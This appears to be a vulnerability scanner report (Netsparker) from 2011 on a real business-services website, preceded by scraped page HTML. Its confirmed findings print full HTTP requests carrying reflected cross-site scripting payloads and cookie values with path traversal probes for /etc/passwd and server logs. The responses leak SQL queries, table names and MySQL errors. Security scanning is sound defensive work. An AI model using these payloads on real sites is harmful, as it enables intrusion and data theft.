>San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E

/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Csc..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013A8)</script>

Request

GET /ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013A8)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lta8p7f52g2ep0t2dkrdqdq583; path=/
Content-Length: 3123
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps 
on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>' OR prj.project_page_url = 'leadflow/css/newlanding_style.css'"--></style></script><script>netsparker(0x0013A8)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013A8)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E

/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013B9)</script>

Request

GET /ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013B9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/css/newlanding_style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f8vg8kbcoecl1g3vkpvku937d3; path=/
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E

/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013CA)</script>

Request

GET /ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013CA)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ue00r32cp5la9i19t6fq6hs4g6; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 